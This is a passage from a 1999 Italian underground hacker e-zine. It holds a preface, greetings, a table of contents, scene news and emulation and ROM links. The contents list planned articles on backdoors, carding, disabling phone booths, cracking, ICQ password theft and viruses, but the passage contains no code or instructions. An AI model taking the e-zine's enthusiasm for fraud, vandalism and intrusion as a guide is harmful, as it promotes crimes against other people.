ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

Dimensione: px
Iniziare la visualizzazioe della pagina:

Download "ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ"

Transcript

1 @-, ì'ì,., ì'ì,., ì'ì,., ì'ì,., \ )(_) -+- \ / _ \ \ /\ / / _ \ / _ Y -+- : \ /\ V V / _) \ : _ \_ \ \_/\_/ / _ \ ì'ì,., ì'ì,., ì'ì,., ì'ì,., NEW BIES (num 3) (data 07/05/99) [ powered By ZeroCool and N0bodY88 ] DISCLAIMER LEGALE IL NEWBIES STAFF NON SI ASSUME NESSUNA RESPONSABILITA' X L'UTILIZZO DELLE TECNICHE SOTTO RIPORTATE, LE QUALI SONO STATE DISTRIBUITE UNICAMENTE X CONDIVIDERE LE CONOSCENZE DA NOI "ACUISITE" (mitico edu...) E PER CERCARE QUALCUNO CON CUI CONFONTARE LE NS ESPERIENZE E LE CONOSCENZE X MIGLIORARE VICENDEVOLMENTE...DIVERTENDOSI! N0bodY88 of NewBies Staff PREMESSA ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ Questa e-zine e' nata in una giornata qualsiasi di gennaio, mentre 2 newbies stavano parlando tra loro in IRC di non mi ricordo cosa. Da quel fatidico giorno la e-zine e' cresciuta, le persone che ho contattato x scrivere un articolo mi hanno dato la loro disponibilita' e entro alcuni giorni mi hanno fatto avere il loro operato. Alcune persone hanno fatto tardi x notti intere (fra cui il sottoscritto) ed hanno sacrificato il loro tempo x creare qualcosa che fosse nuovo, divertente, che ci facesse diventare + bravi, + amici, + uniti e forse...beh...forse anche + famosi...hihihi! Questo e' quello che abbiamo realizzato insieme, collaborando e scambiandoci opinioni. Se questa e-zine non vi piace, e' troppo semplice o e' stupida non scriveteci (oppure scriveteci x migliorare un art. della e-zine sfruttando le vostre conoscenze) ma se solo sara' piaciuta ad una persona, se solo un ragazzo dopo aver letto questa avra' deciso di passare a linux, di programmare in visual basic, di farsi una propria backdoor o di mettersi a studiare come si usa telnet (troppo poco attrezzato di voci nei menu x essere quello tanto decantato dovunque, ma anche troppo simpatico con il suo prompt a mo di Commodore 64) allora questa e-zine sara' servita a qualcosa. E ricordate...newbies si nasce, hacker si diventa. Buona lettura ^ ^ N0bodY88 ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ INTRODUZIONE: Intro: Hey benvenuti al numero 3 di questa nostra e-zines io e nobo siam sempre + amici oramai e per questo lo saluto dicendo sei stramitico, saluto il mitico \Spirit\ di bfi dicendo : bfi5 mi e'piaciuto molto [l'ho letto tutto di un fiato ], volevo farti cmq notare anche se non abbiamo fatto in tempo a dirtelo prima su NewBies 2 ci siamo anche noi completamente dissociati dall'apporre e divulgare green e per questo avevamo deciso di togliere la pagina dei green anche se tutto cio' non e' ancora stato fatto. Voglio anche farti notare che quelli esposti non erano veri e propri green ma numeri di info o altro, che cmq non servono x collegarsi a internet, cmq accetto la critica ovviamante giusta e concordo su come la pensi pienamente e colgo l'occasione per essere stato cosi'poco furbo da non toglierli subito. Colgo anche l'occasione dato che gia'molti me lo hanno fatto notare che un paio di articoli sono stati rippati completamente in NewBies 2 da testi inglesi da alcuni dei nostri collaboratori, inizio col dire che sia io che N0bodY88 non ci riteniamo responsabili per simili lamerate e che cmq chi ha fatto la cazzata di rippare e' stato immediatamente espulso dalla crew che preferisce avere 10 articoli fatti bene che 100 fatti alla cazzo. Spero di essermi fatto capire bene, credo che rippare sia scorretto soppratutto verso chi ha lavorato a un testo giungendo con il proprio lavoro a un risultato ; io sinceramente mi incazzerei come una mina se qualcuno rippasse i miei articoli [anche se non penso che meritino di essere rippati [doppiosenso scusate] ]... Saluto tutto quelli che conosco in internet e in particolare: N0bodY88, Ax1s, DarkSchnaider [o meglio Garo della

2 Garofanosoft ], \Spirit\, Cavallo, quelli di rootsheel, i miei amici di Telstra, i miei amiconi di efnet in particolare dei canali #roms, #emu, #italia su efnet siete mitici, quelli su irc.tin.it nei canali #hackernow e #hackers, w00w00, RaffyCrash, quelli di #emuita in particolare F{G}F, Spino, Etron e Mythos e questa volta il mio saluto va' con tutto il cuore a due persone in particolare : Kevin [liberateloooooo] e SKuZ [una persona che sa' quello che vale eppure non si va'vanta]. Raga ci si vede tutti all'hackit99 ZeroCool Provoces the best you will die like a slave ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ Í» º ARTICOLO ÌÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎ͹ AUTORE º ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ Í¹ PREMESSA N0bodY88 INTRODUZIONE ZeroCool NOVITA' NewBies Staff ³ BFI, RINGZERO, SPAGHETTI PHREAKERS E IL FUTURSHOW N0bodY88 ³ ³ QUALCHE LINK E QUALKE NEWS ZeroCool ³ ³ ELECTRO-RIPPER I DDT E I DIB N0bodY88 ³ ³ PRESO GRANDE HACKER CHE USAVA UN VIRUS!!! ³ ³ L'ANGOLO DELLA POSTA ZeroCool ³ ³ RIEPILOGO LINK IN ORDINE ALFABETICO N0bodY88 ³ INFO SUGLI ALLEGATI NewBies Staff ³ 2 PAROLE SUGLI ALLEGATI N0bodY88 ³ PROGRAMMAZIONE NewBies Staff ³ C TUTORIAL [ TERZA PARTE ] ElectroRipper ³ ³ MIRC SCRIPTING TUTORIAL [ PRIMA PARTE ] SpYmAsTeR ³ ³ NASCONDERE UN PROGRAMMA ALL'INTERNO DI UN ALTRO IN PASCAL Master-Parsifal³ ³ PASCAL TUTORIAL [ SECONDA PARTE ] T0rment0 ³ ³ PRIMI PASSI VERSO L'ASSEMBLER [ PRIMA PARTE ] So[RD]eN ³ ³ SUGGERIMENTI PER IL VISUAL BASIC T0rment0 ³ ³ BACKDOORS FOR DUMMIES (OVVERO COME FARSI UNA BACKDOOR) ipley ³ ³ PROGRAMMAZIONE DI DEMO X NINTENDO 64 ZeroCool ³ ANARCHIA, BANCHE, BOMBE ET SIMILI NewBies Staff ³ COME RENDERE INUTILIZZABILE UNA CABINA TELEFONICA Fusyllo ³ ³ COME HACKERARE UN COIN-OP PiNbALL ³ ³ "COMPLETAMENTO" DELL'ART APPARSO SU NewBies 2 SULLE BANCHE Anonimo ³ ³ LE "FAMOSE" BOLLE MICROSOFT Dante Alighieri³ ³ W LA PESCA DI FRODO Anonymous

3 ³ ³ W I PROF ASSENTI DA squola Anonymous ³ ³ L'ARTE DEL CARDING Killex ³ ³ ARRIVANO I VANDALI!!! Fusyllo ³ ³ POSTING:SE IO SONO IO E TU 6 TU KI E' IL + SCEMO TRA NOI 2 Dante Alighieri³ ³ COME HACKERARE UNO SCOOTER PiNbALL ³ CRACKING NewBies Staff ³ COME CRACKARE UN PROGRAMMA Quequero ³ ³ PRINCIPI DI BASE X CRACKARE UN GIOCHINO AnArChY ³ ³ CRACKARE TELEPORT PRO 1.29 Quequero ³ ³ CRACKING, QUESTO SCONOSCIUTO SpYmAsTeR ³ ³ CRAKKIAMO AGE OF EMPIRES DeViLNeT ³ ³ UN BREVE TUTORIAL SUI GENERATORI DI CHIAVI +MaLaTTiA ³ ³ UN ESEMPIO DI DLL REVERSING -NeuRaL_NoiSE ³ ³ PE-CRYPTERS: UNO SGUARDO DA VICINO AL C.D. "FORMATO" PE Kill3xx ³ ³ MANUALE DI CRACKING S2 ³ TEORIA NewBies Staff ³ COME FUNZIONA NETSTAT Barninga Z ³ ³ SISTEMI OPERATIVI Frensis ³ ³ KERBEROS...IL CAGNACCIO Ulntwh99 ³ ³ GESTIRE + SCHEDE DI RETE CON WINDOWS 95 Barninga Z ³ ³ TCP/IP (QUELLO CHE ANCORA NON E' STATO DETTO) DarkSide ³ ³ NETWORK UTILITIES FOR DUMMIES Firebeam ³ ³ DALLA PARTE DEI SYSADMIN Alpha-666 ³ ³ L'ABC DELLE RETI N0bodY88 ³ ³ LA SCATOLA MAGICA GCC ³ TRADUZIONI NewBies Staff ³ PRESENTAZIONE Wurz ³ ³ EXPLOITS Wurz ³ ³ COME AVERE LA PASSWORD ISP DEL TUO AMICO/NEMICO Wurz ³ ³ LARGE PACKET ATTACKS (ALIAS PING DELLA MORTE) Wurz ³ INTERVISTE NewBies Staff ³ INTERVISTA A UN HACKER - REDATTORE DI E-ZINE N0bodY88 ³ ³ INTERVISTA A UNA CREW POCO CONOSCIUTA... NonHoNome ³ LOG DEL MESE NewBies Staff ³ M0F0Z LAMER O HACKER??? Kalidor ³

4 ³ SCUSSA CHE TU CCIAI UNA CARTA DI CREEDITO? N0bodY88 ³ PHREAKING NewBies Staff ³ ASCOLTARE LE CHIAMATE DEI CELLULARI Fusyllo ³ ³ SEGRETERIA DEI CELLULARI TIM Velvet ³ ³ BLUE BOX VaFfa ³ ³ BOXA DI QUI, BOXA DI LA' ZeroCool ³ VIRUS NewBies Staff ³ FILOSOFIA DEL VIRER MODERNO Caos83 ³ ³ DABATCHA PRESENTS: VBASIC DAFT-PROGRAMMING ~ÑaBat½ha ³ ³ TIPI DI VIRUS Quequero ³ ³ PEPSI5: PACCHETTI UDP A TRADIMENTO T0rment0 ³ ³ MACRO - VIRUS T0rment0 ³ IL MONDO DI IRC NewBies Staff ³ COME PIAZZARE UN BOT-to SENZA FARCELO SALTARE The Sciack ³ ³ IRC NETWORKS SpYmAsTeR ³ ³ INTERVISTA CON UN IRCOP SpYmAsTeR ³ ³ IRC SECURITY SpYmAsTeR ³ ³ NONSOLOKICK PASSWORDZ 1-v-n0-n4m3 ³ ³ IL PUNTO SU IRC TetoFuck ³ ³ GUIDA PRATICA AL SETTAGGIO DI UN BOT Dante Alighieri³ HACKING DI TUTTO DI PIU' E DIVERSI ART. MOLTO INTERESSANTI NewBies Staff ³ LO CHIAMAVANO GUEST STAR Cavallo ³ ³ TRASHING.. CHE PASSIONE! HarLoK ³ ³ PIEDINI CHE CASINO! RigoR MorteM ³ ³ AGGRESSOR SpYmAsTeR ³ ³ GUIDA AL NETBUS 2.0 Quequero ³ ³ BREVI SAGGI DI NETWORKING SOTTO LINUX 1 Alpha-666 ³ ³ TV HACKING E SATELLITE CRACKING ZeroCool ³ ³ BREVI SAGGI DI NETWORKING SOTTO LINUX 2 Alpha-666 ³ ³ SISTEMI DI NUMERAZIONE (BINARIO, DECIMALE, ESADECIMALE) Quequero ³ ³ NAVIGHIAMO AL NETCAFE' IN ALLEGRIA Unlt ³ ³ COME CREARVI UN MENU DI BOOT PERSONALIZZATO SpYmAsTeR ³ ³ COME SCAVALCARE LA PASSWORD DEL BIOS Yago ³ ³ LA STORIA DELL'HACKING T0rment0 ³ ³ L'ANGOLO DEI FILM INTERESSANTI N0bodY88 ³ ³ UNIX AIX ALLA JOHN THE RIPPER McFly

5 ³ ³ ARTICOLO DI CHRISTOPHER KLAUS X ROOTSHELL ZeroCool ³ ³ LISTA PORTE Dante Alighieri³ ³ NETBUS Sephiroth ³ ³ KEY LOGGER QUESTO SCONOSCIUTO Sephiroth ³ ³ OVERCLOCKING [ SECONDA PARTE ] Ulntwh99 ³ ³ ICQ EXPLOIT OVVERO COME FOTTERE LE PASS Sephiroth ³ ³ OVERCLOCK E OVERCLOCK VOODOO 1 SoftWord ³ ³ CHE ABBIANO CAPITO QUALCOSA? Ja[3]Ck ³ ³ HACKING DEI COMPUTER NETBIOSSATI Kalidor ³ ³ TRE SEMPLICI BACKDOOR HaMelIn ³ ³ CACHE DI IE...DOVE HAI MESSO IL MIO MIDI??? N0bodY88 ³ ³ SICUREZZA E LINUX [max] ³ ³ UNA STORIA SULLA TELEKOZZ StuZzik0& bleah³ ³ AMMINISTRAZIONE AVANZATA DI UN SISTEMA UNIX TetoFuck ³ ³ COME OVERCLOCKARE IL NS. AMATO MASTERIZZATORE Brusto ³ ³ TRUCCHI SU DOS Quequero ³ ³ S.A.T.A.N. Anti-social ³ ³ RADIO CHE PASSIONE Ulntwh99 ³ ³ MILANO CITTA' DI FUOCO Ulntwh99 ³ CHEAT NewBies Staff ³ TRUCCHI NEI GIOCHI CHE COMINCIANO X A E B P4p31_N0 ³ SALUTI NewBies Staff PARZIALE ASSENZA DI N0bodY88 N0bodY88 NEWBIES STAFF N0bodY88 ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÙ ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ² ÛÛÛ ÛÛ ÛÛÛÛÛÛ ÛÛ ÛÛ ÛÛ ÛÛÛÛÛÛÛÛÛÛ ÛÛ ² ² ÛÛÛÛ ÛÛ ÛÛ²²ÛÛ ÛÛ ÛÛ Û ÛÛ Û ÛÛÛ ÛÛ ² ² ÛÛ ÛÛ ÛÛ ÛÛ²²ÛÛ ÛÛ ÛÛ ÛÛ ÛÛÛ ÛÛ ÛÛÛ ÛÛ²ÛÛ ² ² ÛÛ ÛÛÛÛ ÛÛ²²ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛÛÛÛÛÛ ² ² ÛÛ ÛÛÛ ÛÛÛÛÛÛ ÛÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ² ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ º º³ BFI, RINGZERO, SPAGHETTI PHREAKERS E IL FUTURSHOW ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ Salve a tutti e benvenuti a questo nuovo numero di NewBies la e-zine fatta da (x la maggior parte) e x newbies. Allora le novita' di questo mese o + sono essenzialmente le seguenti, riportate in ordine alfabetico: BFI = ebbene si non ci credo ancora su BFI 5 si e' parlato di noi! Un tnx quindi

6 a /spirit/ al quale promettiamo qui sulla e-zine di non trattare + di green e al quale diciamo anke che una collaborazione con la deagostini per un corso di hacking con tanto di bb inclusa...e' una bella idea!!! Un tnx a tutto lo staff di BFI quindi che speriamo vada avanti come e meglio di Phreak. Il sito di BFI x quelle poke persone che tornano adesso da una spedizione di 2 anni al centro del polo nord, e' questo: e tanto x puntualizzare ricordiamo che BFI e Softpj NON sono la stessa cosa quindi non confondeteli, ma amateli entrambi :). AGGIORNAMENTO: se non potevo credere che su BFI si parlava di noi provate a immaginarvi cosa si prova a ricevere in mail un articolo da un certo (sconosciuto ai + =)) Cavallo de Cavallis e poi ditemi... FUTURSHOW = gruppo neonato che...ma che cax dico? Allora il futurshow sapete tutti cos'e' e se non lo sapete vi basti sapere (trovatemi uno che dica lo stesso verbo tre volte in 12 parole!) che e' un insieme di molti stand (ben 5!!!) dove ci si va a vedere le diverse radio, i vari gestori di telefonia che sono un piacere e ve lo giuro sul fatto che vado a messa ogni mattina...cmq direte voi se sto fs e' cosi' na m***a xche' ce ne stai a parlare? Allora un certo tipetto non molto conosciuto (hihihi) che in rete gira col nick RigoR MorteM ha deciso di smettere di trovarsi a scrivere con un bel po' di gente e ha avuto l'idea...e se ci si vedesse al fs in real mode? Alche' io ho chiesto ad alcuni del NewBies Staff di venire, poi si sono aggiunti altri e dai 20 che RigoR aveva in mente ci siamo trovati in 35 (o+) tra i quali vi era gente degli Spippolatori (qualcuno...) di BFI (2), del Softpj (2), degli Spaghetti Phreakers (1), e del NewBies Staff (8 se non sbaglio) quindi abbiamo passato una fantastica giornata (anke se un po' frammentati) con formattazione (o tentata tale) di qualke pc della tin, un po' di surf su cd MS con realativa bolla annessa (Dante docet) ci siamo divertiti un casino, abbiamo abbinato ai nick qualke faccia e alla fine ce ne siamo tornati a casetta propria...se volete saperne di + leggetevi la recensione di RigoR MorteM sulle sue disavventure con gli addetti microsoft riportata nel numero 5 di NetRunners che trovate anke nel formato html sul fantastico sito cmq una cosa la devo dire...il fs e' una...lasciamo perdere... NETRUNNERS = ebbene si' e' uscito il mitico numero 4 di NetRunners dove trovate un bel po' di materiale da inserire nei ns hd mentali ^_^...e mi dicono stia quasi x uscire il 5ø numero, ma...cavolo almeno non sbavate sulla stampa di NewBies! hihihi Master(C) AGGIORNAMENTO = ebbene si' e' uscito anke il numero 5 che ho potuto visionare solo x poco causa prob. miei ma come al solito, 1 tremenda maledizione si abbattera' su coloro che non la scarichera'!!! RINGZ3R0 = con questo mitico gruppo abbiamo fatto un patto straconveniente (x noi) nel senso che noi prendiamo alcuni dei loro articoli e li pubblichiamo mentre loro...si accontentano di vederli pubblicati! Sperando che dopo questo numero di NewBies non cambino sito, canale irc x la vergogna (hihihi) saluto tutti i membri, gli external con i quali, nel canakle, mi sono sentito veramente un programmatore di m3rd4 xche' non capivo un cax...hihihi. PS: il loro sito che se volete vivere dovrete visitare almeno una volta alla settimana xche' una volta visitato provoca dipendenze (ve lo giuro!) e' il seguente: e ficcatevelo bene nei bookmark xche' se amate anke solo fare programmi alla cax [come i miei] questo e' un must! (PS: con quest'ultima frase non volevo xo' offendere i Ring0) SPAGHETTI PHREAKERS = sito raggiungibile a dove CdP, Blum e HaRLoK guidano un gruppo che imo puo' portare a risultati mooooolto buoni, e se proprio non vi bastasse la gia' presente lista di art disponbili su cellulari, telefoni et simili, c'e' anke il famoso e mitico cookbook di avatar. Qui sulla e-zine propongo ad HaRLoK di valutare se fare entrare Dante negli Spaghetti, il xche'? Ti ricordi del suo cellulare? Si si quello che assomigliava a una cornetta di una cabina...hihihi AGGIORNAMENTO: ora ho lo stesso modello di cellulare di Dante :D ma il mio non funzia :((((( hihihi

7 SPIPPOLATORI = x i soliti poki che non lo sanno finalmente potete andare sul sito dove tra l'altro ci siamo anke noi di NewBies, quindi grazie a tutti gli Spippolatori, tra i quali spicca il Webmaster..chi e'? A voi l'ardua prova di indovinare! Cmq andateci spesso e se potete scaricatevelo tutto che e' + di must x qualunque hacker/phreaker/cracker/virus writer/newbies. PS: se non ci andrete entro 2 ore dall'apertura di questo txt i vs hd diventeranno buoni solo x giocarci come fresbee!!!! Da segnalare il fatto che pur avendo come webmaster una persona che lavora mooooolto [pure troppo direi!!!] il sito ogni settimana viene aggiornato con sempre nuove guide e sempre + guide e/o mirror di siti vengono addati [tanto x citarne alcuni Ring0, cookbook di Avatar, NetRunners, NewBies e molti altri vengono addati gg dopo gg quindi non esitate e andate giu' di teleport a manetta :DDD] N0bodY88 ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ º º³ QUALCHE LINK E QUALKE NEWS ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ Un poco di news generali : come al solito questa e' una delle parti che preferisco fare, qui si parla di news generali, articoli, notizie, siti e nuovi programmi e secondo me e' una buona buona parlare anche di un poco di argomenti divertenti in una ezines cosi' specialistica. Allora inizio a darvi il mio caro bookmark del mese con i miei sitazzi preferiti il mio sito under construction elenco telefonico mondiale, bellissimo da vistare assolutamente Sito di emulazione Emulatore Saturn Emulatore Saturn Sito Di Emulazione Compatibily list For SunSet [Emulatore N64] Emulatore SuperNintendo Emulazione In Generale Emulatore PlayStation Emulazione in Generale Prometeo ftp://www.gnet1.com/pub1/roms/ Rom and More

8 Cps1 e 2 [solo una] adress: hem.passagen.se/ogg Okki per me sti link sono bellissimi e riguardano in particolare l'emulazione. Faccio notare per i principianti che e' uscita una distribuzione di linuzzo denominata Mandrake, abbastanza semplice da usare ma molto pesante sul sistema a causa della gui che si chiama kde. Molte news riguardo programmi e exploit sono uscite in particolare se volete cercare exploit consiglio il solito mega sitone: e per siti / programmi nuovi il mitico astalavista Bha per linux consiglio : per i giochi sempre aggiornato e per il resto guardate troverete sempre qualcosa di aggiornato o senno' Bon Nuit ZeroCool Provoces the best you will die like a slave ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ º º³ ELECTRO-RIPPER I DDT E I DIB ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ Allora in questo spazio volevo parlarvi di due nuove e-zine che andranno ad arricchire l'underground italiano sulla rete (troppe volte sottovalutato). La prima e' gestita da ElectroRipper (uno dei ns mitici scrittori) e potete reperirla sul web o su irc chiedendo a me, a ElectroRipper o a qualcuno cmq su #hackernow di IrcNet (solo xche' non so l'url da dove scaricare la e-zine in questione, dato che appena mi arriva l'url saremo felici di comuni carvelo [ps: a me l'hanno passata se no mettevo l'url]). Il nome di questa nuova e-zine e' Vana Imago ed e' visualizzabile sotto dos/windows dato che e' in formato.exe. L'interfaccia grafica e' molto bella e non occupa neanche tanto. Io ho dato un letta agli articoli e non sembrano niente male...se poi pensate che e' solo il primo numero di una lunga serie :) vi sfregerete le mani dalla contentezza!!! L'altra e-zine che sta nascendo e' curata dai DDT (Digital Destruction Team) che potete trovare su #ddt.ita di IrcNet. Non ho visto neanche un loro articolo finora (di quelli che andranno sulla e-zine) ma conoscendo chi ci scrivera' (gente di Spaghetti, alcuni dei 7th_klan e gente preparata quali Vecna, Lord_Destruction, HaRLoK...i DDT insomma!) so gia' che ne verra' fuori una e-zine veramente niente male! Per quanto riguarda i nuovi gruppi siamo venuti a conoscenza di un nuovo gruppo formatosi da poco che va sotto il nome di DIB e che prossimamente scrivera' qualke articolo x noi :) Per adesso sappiamo solo che DIB sta per Digital Italian Bastards e che diventeranno un bel gruppo tosto (speriamo :). Non ci resta quindi che augurare un bocca al lupo x entrambe le e-zine ai nuovi gruppi quali i DIB e molti altri che si stanno formando; ci tengo a precisare che NON c'e' nessuna rivalita' [ almeno simp ] tra le varie e-zine, anzi prevale lo spirito di collaborazione, d'altra parte tutti lo facciamo per insegnare quel poco che sappiamo e x imparare di + :-) Se volete mandare una mail in cui indicate il nome della vs crew e esporci i vs obbiettivi, i requisiti x essere ammessi, potremo mettere in contatto gente che magari non gira dove girate voi, ma che cmq ha gli stessi vs interessi. E ricordate...come disse un grande..."ci sono tre possibbilita': e'

9 possibbole, non e' possibbole, e' IMPOSSIBBOLE!!!. " PS: se dopo avere visto le 2 e-zine direte "Che figata!!!"...be...io ve lo avevo detto :-)))) PSS: ho sentito ElectroRipper e ho l'url dal quale potete scaricarvi la sua nuova e-zine > PSSS: simp = secondo il mio parere [ SpaceIce rulez :D ] Sii-iiuuu-suuunnn N0bodY88 ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ º º³ PRESO GRANDE HACKER CHE USAVA UN VIRUS!!! ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ Riporto qua sotto un art. apparso sull'ultimo bollettino delle novita' di VOLftp sperando di non creare casini pubblicando un loro articolo: >Se vi siete ripresi (noi ancora no!) continuiamo con il notiziario di >questa settimana con una notizia della stampa locale (Unione Sarda) >che riporta la notizia di un ragazzo che giocando con Internet si e' >messo nei guai, concediamo al cronista l'uso del termine Hacker anche >se lo riteniamo improprio, in quanto chiunque utilizzando programmi >che si trovano facilmente sulla rete e' in grado di improvvisarvi >pirata telematico. Gli hacker sono ben altra cosa e hanno ben altre >conoscenze ed abilita'. E' il primo giornalista che vedo che sa distinguere un vero hacker da un lamer...ma aspettiamo x giudicare il tipo che hanno preso :) Cmq complimenti al giornalista xche' ha dimostrato di capire la differenza tra chi e' spinto dalla conoscenza e da chi vuole solo fare il figo e/o mona! >Comunque meditate!! Uno scherzo si puo' anche farlo agli amici ma >effettuarlo sistematicamente e su larga scala ai danni di sconosciuti >porta a conseguenze penali decisamente pesanti. Chi sbaglia paga... >E come vedete l'autorita' e' oramai preparata ad intervenire per >tutelare i cittadini anche quando navigano sulla rete ed e' sensibile >alle segnalazioni. Infatti il NOPT e' attivo come e' vero che io sono un hacker! :P >L'hacker denunciato e' un geometra cagliaritano di 25 anni Sottolineo quell'"hacker"... >Files rubati ai computer dei "navigatori" grazie al virus diffuso su >Internet Virus? che virus sara'??? >Meglio non fermarsi a chiacchierare con gli sconosciuti, soprattutto >sulle chat-line di Internet. L'hanno imparato a proprie spese numerosi >abbonati a diversi provider nazionali, ai quali un hacker cagliaritano >di 25 anni ha sottratto, durante la navigazione, gli identificativi e >le password per collegarsi in rete. Visto che c'era, G. F., geometra >disoccupato, ha fatto di piu': dal disco fisso dei computer delle >vittime, ha portato via documenti e fotografie 